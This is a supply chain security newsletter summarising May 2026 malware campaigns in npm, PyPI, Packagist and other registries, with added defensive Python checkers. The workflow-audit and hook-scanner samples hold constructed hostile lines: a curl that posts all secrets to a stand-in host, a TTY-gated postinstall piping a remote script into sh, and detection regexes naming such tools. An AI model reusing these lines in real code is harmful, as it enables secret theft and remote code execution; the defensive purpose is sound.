Cloud Native Digest - May 2026

The Cloud-Native Digest is a monthly roundup on all things cloud native, artifact management, and supply chain security from Cloudsmith's Head of Developer Relations, Nigel Douglas.

Last month saw an unprecedented spike in software supply chain attacks across a range of open source upstreams: 73 Open VSX extensions linked to GlassWorm, TeamPCP attacks on SAP CAP npm packages, compromised TanStack npm packages, Intercom packages, PyTorch Lightning PyPI packages, high-profile malicious Checkmarx artifacts, and a compromise of the Bitwarden CLI. There were too many supply chain attacks to count, in all honesty, so in this month's change-up we've decided to list the most impactful supply chain incidents in reverse chronological order, newest first (followed by the usual news roundup).

If you're seeing malicious packages tracked with a "MAL-" ID (the OSV advisory identifier for known-malicious packages, the counterpart of "CVE-" for vulnerabilities) but aren't sure how to track them, check out my recent blog post for the OpenSSF.

Hope you enjoy it!

Supply Chain Security in the month of May

GlassWorm Malware Takedown

Date: 27th May

In a coordinated effort, CrowdStrike, Google, and the Shadowserver Foundation have simultaneously dismantled all C2 channels associated with GlassWorm, a highly resilient, likely Russia-based cybercrime campaign. Since early 2025, the group has targeted software developers by planting data-stealing malware, including JavaScript RATs inside malicious VS Code extensions, npm packages, and Python packages, ultimately poisoning over 300 GitHub repositories. To evade takedowns, GlassWorm utilised complex indirection layers across the Solana blockchain, BitTorrent DHT, Google Calendar, and commercial VPS infrastructure, highlighting the massive blast radius and persistent threat facing modern software supply chains.

Source: https://thehackernews.com/2026/05/glassworm-malware-takedown-disrupts.html


mouse5212-super-formatter - npm package

Date: 27th May

Cybersecurity researchers have discovered a malicious npm package (mouse5212-super-formatter) codenamed Malware-Slop designed to steal data from the directory used by Anthropic’s Claude AI tool. Masquerading as a legitimate deployment utility, the malware uses a GitHub access token during its postinstall stage to recursively upload victim files to a threat actor-controlled repository while hiding behind fake logs. Interestingly, the package leaked its own private GitHub token, suggesting the threat actor may have used AI to generate the malware without maintaining basic OPSEC, a trend that researchers expect to rise as AI lowers the barrier to entry for creating malware.

Source: https://thehackernews.com/2026/05/malicious-npm-package-stole-files-from.html

terminal3airport - npm packages

Date: 27th May

Throughout the month of May, a single npm account (terminal3airport) published 141 packages containing an identical payload: a web proxy unblocker built on the Scramjet framework. Disguised as tutoring websites, these packages function as adware, monetised via popunder ads and tracking scripts rather than relying on traditional install hooks or credential stealers. This campaign represents a case of npm registry abuse, essentially leveraging the registry as free, disposable CDN infrastructure for adware distribution.

Source: https://safedep.io/malicious-npm-terminal3airport-proxy-adware-spam

Forge-jsxy npm RAT

Date: 27th May

Published under a new maintainer account (jacksonkaandorp2), the forge-jsxy malicious npm package resumed the forge-jsx RAT campaign immediately after the original was removed. Across 22 versions (v1.0.66 and later) published between May 4th and 26th, the updated malware added crypto-wallet scanning with BIP39 mnemonic validation, theft of browser-extension databases from more than 21 browsers, WebRTC data channels for communication, durable persistence, and auto-upgrades. Exfiltrated data still routes to the original C2 server and to attacker-controlled Hugging Face repositories.

OSV Advisory: tracked under MAL-2026-3609
Source: https://cyberpress.org/malicious-npm-rat-backdoor

TrapDoor PyPI & npm packages

Date: 24th May

34 malicious packages across 384 versions were used to steal crypto wallets, SSH keys, cloud credentials, and developer secrets from crypto, DeFi, Solana, and AI environments. For execution and persistence the malware abused npm install hooks, Python import-time side effects, and Rust build scripts (build.rs), spanning npm, PyPI and crates.io.

Ecosystems: npm, PyPI, crates.io

Blog: https://phoenix.security/trapdoor-supply-chain-ai-poisoning-npm-pypi-crates

Packagist PHP attacks

Date: 23rd May

A coordinated supply chain attack campaign has impacted eight packages on Packagist. Each carries malicious code that downloads and runs a Linux binary fetched from a GitHub Release URL. What makes the activity stand out is the cross-ecosystem placement: the payload is wired into a package.json lifecycle hook bundled inside the Composer package, so developers and security teams that scan only Composer metadata (composer.json) can miss it entirely.

Packagist

  • r2luna/brain (dev-main)
  • devdojo/wave (dev-main)
  • devdojo/genesis (dev-main)
  • katanaui/katana (dev-main)
  • baskarcm/tzi-chat-ui (dev-main)
  • elitedevsquad/sidecar-laravel (3.x-dev)
  • crosiersource/crosierlib-base (dev-master)
  • moritz-sauer-13/silverstripe-cms-theme (dev-master)

Source: https://thehackernews.com/2026/05/packagist-supply-chain-attack-infects-8.html

Polymarket - npm packages

Date: 21st May

A coordinated supply chain attack saw a throwaway account (polymarketdev) rapidly publish 9 malicious npm packages impersonating legitimate Polymarket trading tools and AI coding assistants. On installation, a postinstall script checks whether it is running in an interactive terminal and stays quiet otherwise, so it evades automated CI/CD sandboxes and only fires on developer workstations. In interactive sessions the malware silently harvests PRIVATE_KEY variables from local .env files and social-engineers the user into pasting a private key into a fake onboarding prompt that claims to encrypt it. In reality the plaintext Ethereum/Polygon private keys are sent immediately to an attacker-controlled Cloudflare Worker endpoint, and a persistent local directory (~/.polybot/) is created to fingerprint and track the victim's device across sessions.

npm

  1. polymarket-ai-agent (tracked under: MAL-2026-4209)
  2. polymarket-auto-trade (tracked under: MAL-2026-4210)
  3. polymarket-bot (tracked under: MAL-2026-4211)
  4. polymarket-claude-code (tracked under: MAL-2026-4212)
  5. polymarket-copy-trading (tracked under: MAL-2026-4213)
  6. polymarket-terminal (tracked under: MAL-2026-4214)
  7. polymarket-trade (tracked under: MAL-2026-4215)
  8. polymarket-trader (tracked under: MAL-2026-4216)
  9. polymarket-trading-cli (tracked under: MAL-2026-4217)

Source: https://safedep.io/malicious-polymarket-npm-crypto-wallet-drainer

GitHub incident - VS Code extension

Date: 20th May

GitHub shared additional details of its investigation into unauthorised access to GitHub's internal repositories.

On May 19th, GitHub detected and contained a compromise of an employee device via a poisoned VS Code extension. It removed the malicious extension version, isolated the endpoint, and began incident response immediately.

Status Update: https://x.com/github/status/2056949168208552080
OSM detection (the nrwl.angular-console extension, i.e. Nx Console): https://opensourcemalware.com/vscode/nrwl.angular-console

Mini Shai-Hulud - AntV npm packages

Date: 19th May

A compromised maintainer account led to various npm packages associated with the @antv ecosystem being injected with malware as part of the ongoing Mini Shai-Hulud attacks. This incident affects packages tied to the npm maintainer account atool, including echarts-for-react, a widely used React wrapper for Apache ECharts with roughly 1.1 million weekly downloads.

Ecosystems: npm

Source: https://www.microsoft.com/en-us/security/blog/2026/05/20/mini-shai-hulud-compromised-antv-npm-packages-enable-ci-cd-credential-theft

Nx Console v18.95.0

Date: 19th May

A malicious version of the Nx Console VS Code extension (v18.95.0) was briefly published to the Visual Studio Marketplace and the Open VSX registry. The single-actor compromise stemmed from the upstream TanStack supply-chain breach seven days earlier, which silently exfiltrated a core Nx contributor's GitHub CLI OAuth token and let the attacker bypass unhardened pipeline controls. The extension carried a credential-stealing and persistence payload aimed at developer environments; any user with auto-update enabled during the 39-minute exposure window should rotate all credentials immediately.

Post-Mortem: https://nx.dev/blog/nx-console-v18-95-0-postmortem
GitHub Security Advisory: GHSA-c9j4-9m59-847w

Durabletask - 3 PyPI packages

Date: 18th May

Endor Labs discovered three trojanised versions (1.4.1, 1.4.2, and 1.4.3) of durabletask, the official Python SDK for Microsoft's Azure Durable Functions. The malicious code executes silently upon import on Linux systems, deploying a payload designed to steal credentials across major cloud and secrets platforms like AWS, Azure, GCP, and 1Password. Additionally, the malware targets systems located in Israel with a payload that attempts to wipe the filesystem. The affected versions have since been yanked from PyPI.

OSV Advisory: all three PyPI versions are tracked under MAL-2026-4174
Source: https://www.endorlabs.com/learn/trojanized-microsoft-sdk-durabletask-1-4-1-through-1-4-3-deliver-credential-stealing-malware

Megalodon

Date: 17th May

An automated supply chain attack codenamed Megalodon used throwaway accounts and forged CI identities to push 5,718 malicious commits to 5,561 GitHub repositories within a six-hour window. Using compromised credentials, the attackers injected malicious GitHub Actions workflows in two flavours: a mass-scale variant (SysDiag) triggered by pushes and pull requests, and a targeted variant (Optimize-Build) that lay dormant until triggered manually through the API. Once executed on CI/CD runners, the payloads scraped and exfiltrated cloud credentials (AWS, GCP, Azure), SSH keys, environment variables, and source code secrets to a central C2 server. High-profile targets included Wiznet and Tiledesk; the latter unknowingly propagated the backdoor to the npm registry via routine package updates published directly from its compromised repository.

Source: https://safedep.io/megalodon-mass-github-repo-backdooring-ci-workflows

TanStack impacts OpenAI

Date: 15th May

Two employee devices at OpenAI were affected by the high-profile TanStack supply chain attack orchestrated by the cybercrime group TeamPCP, resulting in the limited exfiltration of internal source-code credentials. No user data or production systems were breached, but because code-signing certificates were among the compromised material, OpenAI had to rotate them, which requires macOS ChatGPT Desktop users to update their apps. The incident is part of a broader, ongoing TeamPCP campaign that has also hit Mistral AI and numerous open source packages, using resilient, multi-tiered malware designed to harvest credentials and cloud infrastructure secrets at scale.

Source: https://thehackernews.com/2026/05/tanstack-supply-chain-attack-hits-two.html

node-ipc - npm package

Date: 15th May

Snyk reported malicious activity in newly published versions of node-ipc, a long-running npm package previously at the centre of one of the most widely discussed supply chain incidents in the JavaScript ecosystem (the 2022 protestware releases).

The affected versions confirmed as malicious were:

  • node-ipc@9.1.6
  • node-ipc@9.2.3
  • node-ipc@12.0.1

OSV Advisory: all three npm versions are tracked under MAL-2026-3744
Source: https://snyk.io/blog/malicious-node-ipc-versions-published-npm
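Turning a MAL- ID into something actionable means checking the exact versions pinned in your lockfile against OSV, which is where the MAL- advisories cited throughout this roundup (MAL-2026-3744 for the three node-ipc releases above, the Polymarket and durabletask IDs earlier) are published. The following is an added example written for this digest, not Snyk's, OSV's or npm's own tooling: it reads a package-lock.json, builds the request body for OSV's /v1/querybatch endpoint, and keeps only the MAL- hits. The lockfile and the OSV response are constructed so that the demo runs offline; only query_osv talks to the network.

```python
"""Check pinned npm dependencies against OSV for MAL- (malicious package) advisories.

Added example, not from the newsletter or from OSV/Snyk. The lockfile and the
OSV response below are constructed for illustration; only node-ipc@9.2.3 and
its MAL id are taken from the node-ipc entry above.
"""
import json
import urllib.request

OSV_QUERYBATCH = "https://api.osv.dev/v1/querybatch"

# Constructed package-lock.json (lockfileVersion 3 shape) for the example.
SAMPLE_LOCKFILE = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/node-ipc": {"version": "9.2.3"},
        "node_modules/lodash": {"version": "4.17.21"},
        "node_modules/foo/node_modules/@scope/pkg": {"version": "2.0.0"},
    },
})


def pinned_packages(lockfile_text):
    """Return (name, version) pairs from a v2/v3 package-lock.json.

    Nested installs live at paths like node_modules/a/node_modules/b; the
    package name is everything after the last 'node_modules/' (scoped names
    keep their '@scope/' prefix). The root entry ("") is the project itself
    and workspace links without node_modules/ in the path are skipped.
    """
    lock = json.loads(lockfile_text)
    out = []
    for path, meta in lock.get("packages", {}).items():
        if path == "" or "node_modules/" not in path:
            continue
        name = path.rsplit("node_modules/", 1)[1]
        version = meta.get("version")
        if version:
            out.append((name, version))
    return out


def build_querybatch(pairs, ecosystem="npm"):
    """Shape the request body expected by OSV's /v1/querybatch endpoint."""
    return {"queries": [{"package": {"name": n, "ecosystem": ecosystem}, "version": v}
                        for n, v in pairs]}


def malicious_hits(pairs, response):
    """Pair each query with its result (querybatch answers in query order) and
    keep only MAL- ids. GHSA-/CVE- entries describe vulnerabilities in benign
    code and are left out so the output is confirmed malware only."""
    hits = []
    for (name, version), result in zip(pairs, response.get("results", [])):
        for vuln in result.get("vulns") or []:
            if vuln.get("id", "").startswith("MAL-"):
                hits.append((name, version, vuln["id"]))
    return hits


def query_osv(pairs, ecosystem="npm"):
    """Live lookup (network); not used by the offline demo below."""
    body = json.dumps(build_querybatch(pairs, ecosystem)).encode()
    req = urllib.request.Request(OSV_QUERYBATCH, data=body,
                                 headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


# Constructed response in the querybatch shape: node-ipc@9.2.3 flagged with the
# MAL id the newsletter cites (the 'modified' timestamp is made up); the other
# two packages come back clean.
SAMPLE_RESPONSE = {"results": [
    {"vulns": [{"id": "MAL-2026-3744", "modified": "2026-05-15T00:00:00Z"}]},
    {"vulns": []},
    {},
]}

if __name__ == "__main__":
    pairs = pinned_packages(SAMPLE_LOCKFILE)
    for name, version, mal_id in malicious_hits(pairs, SAMPLE_RESPONSE):
        print(f"BLOCK {name}@{version}: {mal_id}")
```

For PyPI or Packagist lockfiles the only change is the ecosystem string ("PyPI", "Packagist") and the lockfile parser; the querybatch shape and the MAL- filter are the same.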

TeamPCP open-sources Shai-Hulud worm

Date: 13th May

TeamPCP, the group linked to the compromise of TanStack's npm packages, has teamed up with Breached forum to announce a supply chain attack competition with a $1,000 prize in Monero. As part of the announcement, the Shai-Hulud worm has been open-sourced and hosted on the forum's content delivery network. According to screenshots shared by Dark Web Informer on X, the competition rules require participants to use the worm in their attacks and submit proof that they have obtained access to a target's environment.

Status Update: https://x.com/DarkWebInformer/status/2054590267252940870

micresoft and superbase typosquatted npm packages

Date: 12th May

Five npm packages (impersonating libraries such as Supabase, Microsoft Graph, and Apache Iceberg) were found carrying an identical, malicious 4.5 MB ELF binary hidden inside a .claude/ directory. The malware executes immediately on npm install via a preinstall script and then re-executes at the start of every Claude Code session by hijacking a project-level SessionStart hook. The statically linked, UPX-compressed binary harvests the usual credential targets: environment variables, home directory contents, and Git repository data.

Source: https://safedep.io/malicious-npm-packages-claude-code-hooks

Tanstack npm packages

Date: 11th May

84 npm packages in the popular tanstack namespace were compromised as part of the Mini Shai-Hulud campaign, alongside additional packages across npm and PyPI from OpenSearch, Mistral AI, and Guardrails AI. The attack chained GitHub Actions weaknesses (including cache poisoning and OIDC token extraction) to publish heavily obfuscated, credential-stealing malware targeting CI systems and developer workstations. Impacted organisations are advised to rotate exposed secrets immediately, audit repository histories, restrict GitHub Actions OIDC permissions, and verify dependency hashes to limit further exposure.

Ecosystems: npm, PyPI

Source: https://cloudsmith.com/blog/tanstack-npm-packages-compromised-in-mini-shai-hulud-attack
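Both Megalodon (workflows injected into thousands of repositories) and the TanStack compromise (cache poisoning plus OIDC token extraction) ran inside GitHub Actions, and the advice above (restrict OIDC permissions, verify dependency hashes) translates into a handful of workflow-level checks. The following is an added example for this digest, not code from any of the vendors or projects mentioned: a stdlib-only triage script that flags the most common weaknesses in workflow text. Both workflows are constructed and the 40-character SHA is a placeholder, not a real commit.

```python
"""Static checks on GitHub Actions workflow text for the weaknesses the
Megalodon and TanStack write-ups turn on: write-all tokens, fork code running
with secrets, loosely granted OIDC tokens, secrets piped off the runner, and
unpinned actions. Added example using stdlib regexes only (no YAML parser), so
treat it as a triage heuristic, not a policy engine. Both workflows below are
constructed; the hex SHA is a placeholder, not a real commit.
"""
import re

USES = re.compile(r"^\s*-?\s*uses:\s*([\w.-]+/[\w./-]+)@(\S+)", re.M)
TOP_PERMISSIONS = re.compile(r"^permissions:", re.M)          # column 0 only
PR_TARGET = re.compile(r"\bpull_request_target\b")
PR_HEAD_CHECKOUT = re.compile(r"ref:\s*\$\{\{\s*github\.event\.pull_request\.head\.(sha|ref)")
ID_TOKEN_WRITE = re.compile(r"id-token:\s*write")
SECRETS_EXFIL = re.compile(r"toJSON\(\s*secrets\s*\)|^.*\b(curl|wget)\b.*\$\{\{\s*secrets\..*$", re.M)
FULL_SHA = re.compile(r"[0-9a-f]{40}")


def audit_workflow(text):
    """Return human-readable findings; an empty list means nothing tripped."""
    findings = []
    if not TOP_PERMISSIONS.search(text):
        findings.append("no top-level permissions block: jobs without their own "
                        "permissions inherit the repository default GITHUB_TOKEN scope")
    if PR_TARGET.search(text) and PR_HEAD_CHECKOUT.search(text):
        findings.append("pull_request_target checks out the PR head: code from a fork "
                        "runs with the base repository's secrets")
    if ID_TOKEN_WRITE.search(text):
        findings.append("id-token: write lets any step in that job mint an OIDC token; "
                        "confine it to the publish job and keep untrusted steps out of it")
    if SECRETS_EXFIL.search(text):
        findings.append("secrets serialised or handed to curl/wget in a run step: "
                        "exfiltration pattern")
    for name, ref in USES.findall(text):
        if not FULL_SHA.fullmatch(ref):
            findings.append(f"{name}@{ref} is a mutable tag or branch: pin the action "
                            "to a full commit SHA so its code cannot be swapped underneath you")
    return findings


# Constructed workflow showing every weakness the checks look for.
RISKY_WORKFLOW = """\
name: ci
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      id-token: write
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - uses: actions/setup-node@v4
      - run: npm ci && npm test
      - name: diag
        run: curl -s -X POST https://example.invalid/collect -d '${{ toJSON(secrets) }}'
"""

# Constructed hardened counterpart; the SHA is a placeholder, not a real commit.
HARDENED_WORKFLOW = """\
name: ci
on:
  pull_request:
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567  # placeholder SHA
      - run: npm ci --ignore-scripts && npm test
"""

if __name__ == "__main__":
    for label, wf in (("risky", RISKY_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(f"== {label}: {len(audit_workflow(wf))} finding(s)")
        for finding in audit_workflow(wf):
            print("  -", finding)
```

Point it at every file under .github/workflows/ and treat a new or modified workflow that trips the exfiltration or pull_request_target checks as an incident, not a lint warning; that is the shape of what Megalodon pushed.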

Checkmarx Jenkins AST plugin

Date: 9th May

Beginning March 23, 2026, Checkmarx suffered a supply chain security incident after attackers used credentials stolen in a broader industry attack to gain unauthorised access to its GitHub repositories. Over several waves the attackers exfiltrated data (later leaked on the dark web) and published malicious code to externally distributed artifacts, including VS Code extensions, GitHub Actions, and now a trojanised Jenkins plugin pushed to the Jenkins plugin marketplace using credentials taken in the March breach.

Incident summary: https://checkmarx.com/blog/ongoing-security-updates
OSV Advisory: a large number of malicious packages are tracked from the Checkmarx breach

Open-OSS/privacy-filter - Hugging Face repository

Date: 7th May

A highly downloaded, trending Hugging Face repository named Open-OSS/privacy-filter was removed after it was discovered typosquatting OpenAI's legitimate project to deliver malware. Backed by artificially inflated engagement from bot accounts, the repository contained a malicious loader.py file that executed a silent, multi-stage PowerShell attack chain on Windows machines. The final payload is a sophisticated, Rust-based credential infostealer designed to bypass security controls and exfiltrate browser data, Discord tokens, crypto wallets, and sensitive files to a command-and-control server. Because the malware fully compromises host credentials and session cookies, researchers strongly recommend that any affected users immediately reimage their systems and rotate all active passwords, tokens, and keys from a clean device.

Source: https://www.hiddenlayer.com/research/malware-found-in-trending-hugging-face-repository-open-oss-privacy-filter

bmrxntfj - NuGet libraries typosquatted

Date: 6th May

5 malicious NuGet packages were published by the account bmrxntfj. Targeting developers and CI/CD environments in Chinese enterprise .NET ecosystems, they impersonate popular open-source and internal infrastructure libraries (typosquatting AntdUI). A cross-platform .NET module initialiser runs the payload automatically as soon as the assembly is loaded, with no call from application code required; the .NET Reactor-protected payload then hooks the CLR JIT compiler to evade static detection, while the actor rotated through 224 package versions to invalidate file-hash IoCs.

NuGet

  • IR.DantUI
  • IR.Infrastructure.Core
  • IR.Infrastructure.DataService.Core
  • IR.iplus32
  • IR.OscarUI

Source: https://socket.dev/blog/5-malicious-nuget-packages-impersonate-chinese-ui-libraries

BufferZoneCorp - Ruby Gems and Go Modules

Date: 2nd May

The campaign, run from the GitHub account BufferZoneCorp, targeted developers, CI runners, and build environments across both the Ruby and Go ecosystems. The threat actors published sleeper packages under names mimicking legitimate developer tools (such as HashiCorp or Rails utilities), then updated them with malicious payloads that execute automatically on installation or import. On the Ruby side, the gems steal sensitive local credentials and exfiltrate them to a hidden endpoint. On the Go side, the modules carried a distinct payload that tampers with GitHub Actions workflows, poisons GOPROXY settings, disables checksum verification (GOSUMDB=off), modifies workflow environments, and plants unauthorised SSH public keys for persistent host access. While the Go security team swiftly blocked the identified modules, the malicious Ruby gems and the source GitHub account remained live at the time of the report.

Ecosystems: RubyGems, Go modules

Source: https://socket.dev/blog/malicious-ruby-gems-and-go-modules-steal-secrets-poison-ci
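The Go-side payload described above changes the build host rather than the package: it rewrites GOPROXY, switches off the checksum database and adds SSH keys. Those changes are cheap to check for, and the following is an added example for this digest (not Socket's or the Go team's code) that audits a Go environment and an authorized_keys file. The proxy allowlist, the sample environment and both key strings are constructed; replace the allowlist with your own mirror.

```python
"""Host-side checks for the tampering the BufferZoneCorp Go modules are
described as doing: rewriting GOPROXY, switching off the checksum database and
planting SSH keys. Added example, not Socket's or the Go team's tooling. The
allowlist, the sample environment and both key strings are constructed.
"""

# Assumption: your organisation's approved module proxies. "direct" is the
# toolchain keyword for fetching from the origin VCS.
ALLOWED_GOPROXY = {"https://proxy.golang.org", "direct"}
GO_DEFAULT_PROXY = "https://proxy.golang.org,direct"   # toolchain default when unset
GO_DEFAULT_SUMDB = "sum.golang.org"                    # toolchain default when unset


def audit_go_env(env):
    """Return findings for a dict of environment variables (os.environ or the
    parsed output of `go env`, which reports effective values)."""
    findings = []
    sumdb = env.get("GOSUMDB", GO_DEFAULT_SUMDB)
    if sumdb.strip().lower() == "off":
        findings.append("GOSUMDB=off: go.sum is no longer cross-checked against the checksum database")
    proxy = env.get("GOPROXY", GO_DEFAULT_PROXY)
    # GOPROXY is a list separated by ',' (fall through on 404/410) or '|' (on any error).
    for entry in filter(None, (e.strip() for e in proxy.replace("|", ",").split(","))):
        if entry not in ALLOWED_GOPROXY:
            findings.append(f"GOPROXY entry {entry!r} is not an approved proxy; "
                            "modules may be served by whoever controls it")
    # A bare wildcard in any of these exempts every module from proxy/sumdb checks.
    for var in ("GONOSUMDB", "GOPRIVATE", "GOINSECURE"):
        patterns = [p.strip() for p in env.get(var, "").split(",") if p.strip()]
        if any(p in ("*", "**") for p in patterns):
            findings.append(f"{var} contains a wildcard: every module escapes checksum/proxy verification")
    return findings


def unexpected_authorized_keys(authorized_keys_text, known):
    """Return one finding per key in ~/.ssh/authorized_keys that is not in `known`
    (a set of 'keytype base64' strings). Option prefixes such as command="..."
    are skipped; options containing spaces are not handled (kept simple)."""
    findings = []
    for raw in authorized_keys_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        idx = next((i for i, p in enumerate(parts)
                    if p.startswith(("ssh-", "ecdsa-sha2-", "sk-"))), None)
        if idx is None or idx + 1 >= len(parts):
            findings.append(f"unparseable entry: {line[:32]}...")
            continue
        key = f"{parts[idx]} {parts[idx + 1]}"
        if key not in known:
            comment = " ".join(parts[idx + 2:]) or "(no comment)"
            findings.append(f"unknown {parts[idx]} key, comment {comment}")
    return findings


# Constructed sample data (placeholder keys, not real material; .invalid host).
SAMPLE_ENV = {"GOSUMDB": "off",
              "GOPROXY": "https://proxy.example.invalid|https://proxy.golang.org,direct",
              "GOPRIVATE": "*"}
KNOWN_KEYS = {"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKnownKeyPlaceholder000000000000000000"}
SAMPLE_AUTHORIZED_KEYS = """\
# laptop
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKnownKeyPlaceholder000000000000000000 dev@laptop
command="/bin/true" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIUnknownKeyPlaceholder00000000000000000 ci-runner
"""

if __name__ == "__main__":
    for finding in audit_go_env(SAMPLE_ENV) + unexpected_authorized_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_KEYS):
        print("-", finding)
```

Run it on CI runners as a post-job step as well as on developer machines: the payload targets the environment the build executes in, and `go env` inside the job is what the toolchain actually used.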

intercom-php - mini Shai-Hulud in Packagist

Date: 1st May

The widely used PHP package intercom/intercom-php (specifically version 5.0.2) was compromised on Packagist as part of the ongoing Mini Shai-Hulud supply chain campaign (it comes up several times in this article), which primarily targets the PyPI and npm ecosystems. By exploiting Packagist's mutable version tags, the attackers turned the package into a Composer plugin, which Composer itself loads and executes during install and update, so the application's code never needs to run for the infection to trigger. Once active, the malware downloads the Bun JavaScript runtime to execute an obfuscated payload (router_runtime.js) that steals cloud, DevOps, and CI/CD credentials (such as AWS, GitHub, and Kubernetes tokens), exfiltrates them, and propagates by injecting malicious code into other developer workflows and repositories.

Ecosystems: Packagist

Source: https://cloudsmith.com/blog/mini-shai-hulud-reaches-packagist-the-intercom-intercom-php-compromise-explained
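What the Packagist campaign, the Polymarket packages and intercom-php have in common is that the payload runs at install time, before any application code: through a package.json lifecycle hook bundled inside a Composer package, through an npm postinstall script that probes for a TTY, or through Composer loading the package as a plugin. A quick way to inventory those paths in a checked-out dependency tree, as an added example written for this digest rather than tooling from Composer, npm, Packagist or any vendor cited above (the vendor/ tree it scans is constructed and the package names are invented):

```python
"""Walk an installed dependency tree and flag anything that can run code at
install time. Added example, not tooling from Packagist, Composer, npm or any
of the vendors cited in this digest. The vendor/ tree it builds is constructed
and the manifest contents are invented for illustration.
"""
import json
import re
import tempfile
from pathlib import Path

# npm lifecycle scripts that run automatically on `npm install`.
NPM_INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepack", "postpack"}
# Composer event scripts that run automatically on install/update.
COMPOSER_HOOKS = {"pre-install-cmd", "post-install-cmd", "pre-update-cmd", "post-update-cmd",
                  "pre-autoload-dump", "post-autoload-dump",
                  "post-package-install", "post-package-update"}
# Traits of the Polymarket-style postinstall: TTY probing (to stay quiet in CI),
# remote fetch/eval, .env access. Plain regexes, so heuristics only.
SUSPICIOUS = re.compile(r"isTTY|curl\s|wget\s|\beval\(|child_process|base64|\.env\b", re.I)


def _load(path):
    try:
        return json.loads(path.read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return None


def scan_tree(root):
    """Return one finding per install-time execution path under root."""
    findings = []
    for path in sorted(Path(root).rglob("*.json")):
        if path.name not in ("package.json", "composer.json"):
            continue
        data = _load(path)
        if not isinstance(data, dict):
            continue
        rel = str(path.relative_to(root))
        scripts = data.get("scripts") or {}
        if path.name == "package.json":
            for hook in sorted(NPM_INSTALL_HOOKS & set(scripts)):
                cmd = str(scripts[hook])
                findings.append({"file": rel, "kind": "npm-hook", "hook": hook,
                                 "suspicious": bool(SUSPICIOUS.search(cmd)), "command": cmd})
        else:
            # A Composer plugin is loaded by Composer itself on the next install or
            # update, so it is flagged unconditionally regardless of its contents.
            if data.get("type") == "composer-plugin":
                findings.append({"file": rel, "kind": "composer-plugin",
                                 "hook": str((data.get("extra") or {}).get("class", "")),
                                 "suspicious": True, "command": ""})
            for hook in sorted(COMPOSER_HOOKS & set(scripts)):
                cmds = scripts[hook]
                cmd = " && ".join(map(str, cmds)) if isinstance(cmds, list) else str(cmds)
                findings.append({"file": rel, "kind": "composer-hook", "hook": hook,
                                 "suspicious": bool(SUSPICIOUS.search(cmd)), "command": cmd})
    return findings


def build_sample_tree(root):
    """Constructed vendor/ tree with three packages (names and contents invented)."""
    root = Path(root)
    # 1. A PHP package that also ships a package.json with a TTY-gated postinstall.
    theme = root / "vendor" / "acme" / "theme"
    theme.mkdir(parents=True)
    (theme / "composer.json").write_text(json.dumps({"name": "acme/theme", "type": "library"}))
    (theme / "package.json").write_text(json.dumps({"name": "theme-assets", "scripts": {
        "postinstall": "node -e \"if(process.stdout.isTTY){require('child_process')"
                       ".exec('curl -s https://example.invalid/x|sh')}\""}}))
    # 2. A package turned into a Composer plugin (runs on install/update).
    sdk = root / "vendor" / "acme" / "sdk"
    sdk.mkdir(parents=True)
    (sdk / "composer.json").write_text(json.dumps({"name": "acme/sdk", "type": "composer-plugin",
                                                   "extra": {"class": "Acme\\Sdk\\Plugin"}}))
    # 3. A clean package: build script only, no install-time hook.
    clean = root / "vendor" / "acme" / "clean"
    clean.mkdir(parents=True)
    (clean / "package.json").write_text(json.dumps({"name": "clean", "scripts": {"build": "tsc"}}))


def demo():
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for f in demo():
        flag = "!!" if f["suspicious"] else "  "
        print(f"{flag} {f['kind']:<16} {f['file']}  {f['hook']}  {f['command'][:60]}")
```

Run it after `composer install --no-scripts --no-plugins` or `npm ci --ignore-scripts` to see what would have executed had the hooks been allowed; a Composer plugin still needs an allow-plugins entry in composer.json before Composer 2.2+ will load it, which is the setting to review for every hit of that kind.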

Additional Supply Chain Security News and Resources

CVE-2026-31635 - DirtyDecrypt PoC released
Source: 0xBlackash (GitHub)

Publicly accessible proof-of-concept exploit code has been released for DirtyDecrypt, a recently patched local privilege escalation vulnerability in the Linux kernel that lets an attacker modify the contents of read-only files and gain root. It is one of a recent run of similar kernel memory-handling flaws (Copy Fail and Fragnesia among them) affecting distributions such as Fedora, Arch Linux, and openSUSE. The pace of these exploits has prompted Linux kernel developers to consider an emergency runtime kill switch for temporarily disabling vulnerable functions, while distributions such as Rocky Linux have introduced dedicated security repositories to ship urgent, pre-upstream patches.

An update on Composer & Packagist supply chain security
Source: Packagist Blog

In response to the recent surge in open source supply chain attacks (specifically those targeting PHP packages via compromised GitHub accounts), Composer and Packagist.org are rolling out a comprehensive security roadmap. Immediate defences include integrated Aikido malware detection, a public transparency log tracking tag modifications, and Composer 2.10, which introduces a unified dependency policy framework and strict immutability for stable versions so that attackers can no longer retroactively backdoor existing tags. Next, the ecosystem is moving toward mandatory MFA (with MFA status shown publicly on maintainer profiles), a minimum-release-age cooldown, multi-user organisational package ownership, and, longer term, hosting immutable build artifacts directly with SLSA and Sigstore provenance verification.

Announcing etcd 3.7.0-beta.0
Source: Kubernetes Blog

The etcd SIG has announced the first beta release of etcd v3.7.0, a major update that improves security, reliability, and handling of large result sets. A key feature is RangeStream, a new RPC that reduces latency and memory usage by streaming large query results in chunks. The release also completes the v3store migration by removing the legacy v2store components entirely, which may introduce breaking changes for older setups. With the launch of this beta, etcd v3.4 officially reached end of life on May 15th.

PaddleOCR 3.5: Running OCR and Document Parsing Tasks with a Transformers Backend
Source: Hugging Face

